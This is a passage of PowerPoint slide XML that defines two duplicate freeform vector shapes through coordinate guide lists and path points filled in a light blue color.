                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36364" name="Freeform 96"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3810" y="2229"/>
                <a:ext cx="119" cy="89"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 107 w 119"/>
                  <a:gd name="T1" fmla="*/ 77 h 89"/>
                  <a:gd name="T2" fmla="*/ 94 w 119"/>
                  <a:gd name="T3" fmla="*/ 79 h 89"/>
                  <a:gd name="T4" fmla="*/ 93 w 119"/>
                  <a:gd name="T5" fmla="*/ 76 h 89"/>
                  <a:gd name="T6" fmla="*/ 78 w 119"/>
                  <a:gd name="T7" fmla="*/ 84 h 89"/>
                  <a:gd name="T8" fmla="*/ 66 w 119"/>
                  <a:gd name="T9" fmla="*/ 89 h 89"/>
                  <a:gd name="T10" fmla="*/ 62 w 119"/>
                  <a:gd name="T11" fmla="*/ 84 h 89"/>
                  <a:gd name="T12" fmla="*/ 62 w 119"/>
                  <a:gd name="T13" fmla="*/ 69 h 89"/>
                  <a:gd name="T14" fmla="*/ 58 w 119"/>
                  <a:gd name="T15" fmla="*/ 66 h 89"/>
                  <a:gd name="T16" fmla="*/ 54 w 119"/>
                  <a:gd name="T17" fmla="*/ 56 h 89"/>
                  <a:gd name="T18" fmla="*/ 48 w 119"/>
                  <a:gd name="T19" fmla="*/ 60 h 89"/>
                  <a:gd name="T20" fmla="*/ 45 w 119"/>
                  <a:gd name="T21" fmla="*/ 70 h 89"/>
                  <a:gd name="T22" fmla="*/ 39 w 119"/>
                  <a:gd name="T23" fmla="*/ 74 h 89"/>
                  <a:gd name="T24" fmla="*/ 32 w 119"/>
                  <a:gd name="T25" fmla="*/ 75 h 89"/>
                  <a:gd name="T26" fmla="*/ 29 w 119"/>
                  <a:gd name="T27" fmla="*/ 81 h 89"/>
                  <a:gd name="T28" fmla="*/ 19 w 119"/>
                  <a:gd name="T29" fmla="*/ 79 h 89"/>
                  <a:gd name="T30" fmla="*/ 7 w 119"/>
                  <a:gd name="T31" fmla="*/ 86 h 89"/>
                  <a:gd name="T32" fmla="*/ 5 w 119"/>
                  <a:gd name="T33" fmla="*/ 84 h 89"/>
                  <a:gd name="T34" fmla="*/ 9 w 119"/>
                  <a:gd name="T35" fmla="*/ 70 h 89"/>
                  <a:gd name="T36" fmla="*/ 16 w 119"/>
                  <a:gd name="T37" fmla="*/ 60 h 89"/>
                  <a:gd name="T38" fmla="*/ 11 w 119"/>
                  <a:gd name="T39" fmla="*/ 51 h 89"/>
                  <a:gd name="T40" fmla="*/ 11 w 119"/>
                  <a:gd name="T41" fmla="*/ 43 h 89"/>
                  <a:gd name="T42" fmla="*/ 5 w 119"/>
                  <a:gd name="T43" fmla="*/ 41 h 89"/>
                  <a:gd name="T44" fmla="*/ 1 w 119"/>
                  <a:gd name="T45" fmla="*/ 32 h 89"/>
                  <a:gd name="T46" fmla="*/ 17 w 119"/>
                  <a:gd name="T47" fmla="*/ 32 h 89"/>
                  <a:gd name="T48" fmla="*/ 21 w 119"/>
                  <a:gd name="T49" fmla="*/ 25 h 89"/>
                  <a:gd name="T50" fmla="*/ 24 w 119"/>
                  <a:gd name="T51" fmla="*/ 21 h 89"/>
                  <a:gd name="T52" fmla="*/ 21 w 119"/>
                  <a:gd name="T53" fmla="*/ 20 h 89"/>
                  <a:gd name="T54" fmla="*/ 27 w 119"/>
                  <a:gd name="T55" fmla="*/ 17 h 89"/>
                  <a:gd name="T56" fmla="*/ 31 w 119"/>
                  <a:gd name="T57" fmla="*/ 13 h 89"/>
                  <a:gd name="T58" fmla="*/ 31 w 119"/>
                  <a:gd name="T59" fmla="*/ 5 h 89"/>
                  <a:gd name="T60" fmla="*/ 37 w 119"/>
                  <a:gd name="T61" fmla="*/ 9 h 89"/>
                  <a:gd name="T62" fmla="*/ 47 w 119"/>
                  <a:gd name="T63" fmla="*/ 2 h 89"/>
                  <a:gd name="T64" fmla="*/ 53 w 119"/>
                  <a:gd name="T65" fmla="*/ 6 h 89"/>
                  <a:gd name="T66" fmla="*/ 47 w 119"/>
                  <a:gd name="T67" fmla="*/ 12 h 89"/>
                  <a:gd name="T68" fmla="*/ 51 w 119"/>
                  <a:gd name="T69" fmla="*/ 17 h 89"/>
                  <a:gd name="T70" fmla="*/ 55 w 119"/>
                  <a:gd name="T71" fmla="*/ 19 h 89"/>
                  <a:gd name="T72" fmla="*/ 50 w 119"/>
                  <a:gd name="T73" fmla="*/ 23 h 89"/>
                  <a:gd name="T74" fmla="*/ 42 w 119"/>
                  <a:gd name="T75" fmla="*/ 18 h 89"/>
                  <a:gd name="T76" fmla="*/ 33 w 119"/>
                  <a:gd name="T77" fmla="*/ 22 h 89"/>
                  <a:gd name="T78" fmla="*/ 31 w 119"/>
                  <a:gd name="T79" fmla="*/ 23 h 89"/>
                  <a:gd name="T80" fmla="*/ 30 w 119"/>
                  <a:gd name="T81" fmla="*/ 29 h 89"/>
                  <a:gd name="T82" fmla="*/ 36 w 119"/>
                  <a:gd name="T83" fmla="*/ 31 h 89"/>
                  <a:gd name="T84" fmla="*/ 46 w 119"/>
                  <a:gd name="T85" fmla="*/ 32 h 89"/>
                  <a:gd name="T86" fmla="*/ 53 w 119"/>
                  <a:gd name="T87" fmla="*/ 32 h 89"/>
                  <a:gd name="T88" fmla="*/ 58 w 119"/>
                  <a:gd name="T89" fmla="*/ 35 h 89"/>
                  <a:gd name="T90" fmla="*/ 64 w 119"/>
                  <a:gd name="T91" fmla="*/ 31 h 89"/>
                  <a:gd name="T92" fmla="*/ 68 w 119"/>
                  <a:gd name="T93" fmla="*/ 34 h 89"/>
                  <a:gd name="T94" fmla="*/ 70 w 119"/>
                  <a:gd name="T95" fmla="*/ 37 h 89"/>
                  <a:gd name="T96" fmla="*/ 76 w 119"/>
                  <a:gd name="T97" fmla="*/ 38 h 89"/>
                  <a:gd name="T98" fmla="*/ 84 w 119"/>
                  <a:gd name="T99" fmla="*/ 35 h 89"/>
                  <a:gd name="T100" fmla="*/ 96 w 119"/>
                  <a:gd name="T101" fmla="*/ 34 h 89"/>
                  <a:gd name="T102" fmla="*/ 100 w 119"/>
                  <a:gd name="T103" fmla="*/ 34 h 89"/>
                  <a:gd name="T104" fmla="*/ 99 w 119"/>
                  <a:gd name="T105" fmla="*/ 49 h 89"/>
                  <a:gd name="T106" fmla="*/ 106 w 119"/>
                  <a:gd name="T107" fmla="*/ 50 h 89"/>
                  <a:gd name="T108" fmla="*/ 115 w 119"/>
                  <a:gd name="T109" fmla="*/ 53 h 89"/>
                  <a:gd name="T110" fmla="*/ 117 w 119"/>
                  <a:gd name="T111" fmla="*/ 62 h 89"/>
                  <a:gd name="T112" fmla="*/ 117 w 119"/>
                  <a:gd name="T113" fmla="*/ 67 h 89"/>
                  <a:gd name="T114" fmla="*/ 119 w 119"/>
                  <a:gd name="T115" fmla="*/ 74 h 89"/>
                  <a:gd name="T116" fmla="*/ 115 w 119"/>
                  <a:gd name="T117" fmla="*/ 79 h 89"/>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19"/>
                  <a:gd name="T178" fmla="*/ 0 h 89"/>
                  <a:gd name="T179" fmla="*/ 119 w 119"/>
                  <a:gd name="T180" fmla="*/ 89 h 89"/>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19" h="89">
                    <a:moveTo>
                      <a:pt x="115" y="79"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="111" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="79"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36365" name="Freeform 97"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3810" y="2229"/>
                <a:ext cx="119" cy="89"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 107 w 119"/>
                  <a:gd name="T1" fmla="*/ 77 h 89"/>
                  <a:gd name="T2" fmla="*/ 94 w 119"/>
                  <a:gd name="T3" fmla="*/ 79 h 89"/>
                  <a:gd name="T4" fmla="*/ 93 w 119"/>
                  <a:gd name="T5" fmla="*/ 76 h 89"/>
                  <a:gd name="T6" fmla="*/ 78 w 119"/>
                  <a:gd name="T7" fmla="*/ 84 h 89"/>
                  <a:gd name="T8" fmla="*/ 66 w 119"/>
                  <a:gd name="T9" fmla="*/ 89 h 89"/>
                  <a:gd name="T10" fmla="*/ 62 w 119"/>
                  <a:gd name="T11" fmla="*/ 84 h 89"/>
                  <a:gd name="T12" fmla="*/ 62 w 119"/>
                  <a:gd name="T13" fmla="*/ 69 h 89"/>
                  <a:gd name="T14" fmla="*/ 58 w 119"/>
                  <a:gd name="T15" fmla="*/ 66 h 89"/>
                  <a:gd name="T16" fmla="*/ 54 w 119"/>
                  <a:gd name="T17" fmla="*/ 56 h 89"/>
                  <a:gd name="T18" fmla="*/ 48 w 119"/>
                  <a:gd name="T19" fmla="*/ 60 h 89"/>
                  <a:gd name="T20" fmla="*/ 45 w 119"/>
                  <a:gd name="T21" fmla="*/ 70 h 89"/>
                  <a:gd name="T22" fmla="*/ 39 w 119"/>
                  <a:gd name="T23" fmla="*/ 74 h 89"/>
                  <a:gd name="T24" fmla="*/ 32 w 119"/>
                  <a:gd name="T25" fmla="*/ 75 h 89"/>
                  <a:gd name="T26" fmla="*/ 29 w 119"/>
                  <a:gd name="T27" fmla="*/ 81 h 89"/>
                  <a:gd name="T28" fmla="*/ 19 w 119"/>
                  <a:gd name="T29" fmla="*/ 79 h 89"/>
                  <a:gd name="T30" fmla="*/ 7 w 119"/>
                  <a:gd name="T31" fmla="*/ 86 h 89"/>
                  <a:gd name="T32" fmla="*/ 5 w 119"/>
                  <a:gd name="T33" fmla="*/ 84 h 89"/>
                  <a:gd name="T34" fmla="*/ 9 w 119"/>
                  <a:gd name="T35" fmla="*/ 70 h 89"/>
                  <a:gd name="T36" fmla="*/ 16 w 119"/>
                  <a:gd name="T37" fmla="*/ 60 h 89"/>
                  <a:gd name="T38" fmla="*/ 11 w 119"/>
                  <a:gd name="T39" fmla="*/ 51 h 89"/>
                  <a:gd name="T40" fmla="*/ 11 w 119"/>
                  <a:gd name="T41" fmla="*/ 43 h 89"/>
                  <a:gd name="T42" fmla="*/ 5 w 119"/>
                  <a:gd name="T43" fmla="*/ 41 h 89"/>
                  <a:gd name="T44" fmla="*/ 1 w 119"/>
                  <a:gd name="T45" fmla="*/ 32 h 89"/>
                  <a:gd name="T46" fmla="*/ 17 w 119"/>
                  <a:gd name="T47" fmla="*/ 32 h 89"/>
                  <a:gd name="T48" fmla="*/ 21 w 119"/>
                  <a:gd name="T49" fmla="*/ 25 h 89"/>
                  <a:gd name="T50" fmla="*/ 24 w 119"/>
                  <a:gd name="T51" fmla="*/ 21 h 89"/>
                  <a:gd name="T52" fmla="*/ 21 w 119"/>
                  <a:gd name="T53" fmla="*/ 20 h 89"/>
                  <a:gd name="T54" fmla="*/ 27 w 119"/>
                  <a:gd name="T55" fmla="*/ 17 h 89"/>
                  <a:gd name="T56" fmla="*/ 31 w 119"/>
                  <a:gd name="T57" fmla="*/ 13 h 89"/>
                  <a:gd name="T58" fmla="*/ 31 w 119"/>
                  <a:gd name="T59" fmla="*/ 5 h 89"/>
                  <a:gd name="T60" fmla="*/ 37 w 119"/>
                  <a:gd name="T61" fmla="*/ 9 h 89"/>
                  <a:gd name="T62" fmla="*/ 47 w 119"/>
                  <a:gd name="T63" fmla="*/ 2 h 89"/>
                  <a:gd name="T64" fmla="*/ 53 w 119"/>
                  <a:gd name="T65" fmla="*/ 6 h 89"/>
                  <a:gd name="T66" fmla="*/ 47 w 119"/>
                  <a:gd name="T67" fmla="*/ 12 h 89"/>
                  <a:gd name="T68" fmla="*/ 51 w 119"/>
                  <a:gd name="T69" fmla="*/ 17 h 89"/>
                  <a:gd name="T70" fmla="*/ 55 w 119"/>
                  <a:gd name="T71" fmla="*/ 19 h 89"/>
                  <a:gd name="T72" fmla="*/ 50 w 119"/>
                  <a:gd name="T73" fmla="*/ 23 h 89"/>
                  <a:gd name="T74" fmla="*/ 42 w 119"/>
                  <a:gd name="T75" fmla="*/ 18 h 89"/>
                  <a:gd name="T76" fmla="*/ 33 w 119"/>
                  <a:gd name="T77" fmla="*/ 22 h 89"/>
                  <a:gd name="T78" fmla="*/ 31 w 119"/>
                  <a:gd name="T79" fmla="*/ 23 h 89"/>
                  <a:gd name="T80" fmla="*/ 30 w 119"/>
                  <a:gd name="T81" fmla="*/ 29 h 89"/>
                  <a:gd name="T82" fmla="*/ 36 w 119"/>
                  <a:gd name="T83" fmla="*/ 31 h 89"/>
                  <a:gd name="T84" fmla="*/ 46 w 119"/>
                  <a:gd name="T85" fmla="*/ 32 h 89"/>
                  <a:gd name="T86" fmla="*/ 53 w 119"/>
                  <a:gd name="T87" fmla="*/ 32 h 89"/>
                  <a:gd name="T88" fmla="*/ 58 w 119"/>
                  <a:gd name="T89" fmla="*/ 35 h 89"/>
                  <a:gd name="T90" fmla="*/ 64 w 119"/>
                  <a:gd name="T91" fmla="*/ 31 h 89"/>
                  <a:gd name="T92" fmla="*/ 68 w 119"/>
                  <a:gd name="T93" fmla="*/ 34 h 89"/>
                  <a:gd name="T94" fmla="*/ 70 w 119"/>
                  <a:gd name="T95" fmla="*/ 37 h 89"/>
                  <a:gd name="T96" fmla="*/ 76 w 119"/>
                  <a:gd name="T97" fmla="*/ 38 h 89"/>
                  <a:gd name="T98" fmla="*/ 84 w 119"/>
                  <a:gd name="T99" fmla="*/ 35 h 89"/>
                  <a:gd name="T100" fmla="*/ 96 w 119"/>
                  <a:gd name="T101" fmla="*/ 34 h 89"/>
                  <a:gd name="T102" fmla="*/ 100 w 119"/>
                  <a:gd name="T103" fmla="*/ 34 h 89"/>
                  <a:gd name="T104" fmla="*/ 99 w 119"/>
                  <a:gd name="T105" fmla="*/ 49 h 89"/>
                  <a:gd name="T106" fmla="*/ 106 w 119"/>
                  <a:gd name="T107" fmla="*/ 50 h 89"/>
                  <a:gd name="T108" fmla="*/ 115 w 119"/>
                  <a:gd name="T109" fmla="*/ 53 h 89"/>
                  <a:gd name="T110" fmla="*/ 117 w 119"/>
                  <a:gd name="T111" fmla="*/ 62 h 89"/>
                  <a:gd name="T112" fmla="*/ 117 w 119"/>
                  <a:gd name="T113" fmla="*/ 67 h 89"/>
                  <a:gd name="T114" fmla="*/ 119 w 119"/>
                  <a:gd name="T115" fmla="*/ 74 h 89"/>
                  <a:gd name="T116" fmla="*/ 115 w 119"/>
                  <a:gd name="T117" fmla="*/ 79 h 89"/>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19"/>
                  <a:gd name="T178" fmla="*/ 0 h 89"/>
                  <a:gd name="T179" fmla="*/ 119 w 119"/>
                  <a:gd name="T180" fmla="*/ 89 h 89"/>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19" h="89">
                    <a:moveTo>
                      <a:pt x="115" y="79"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="111" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="76"/>
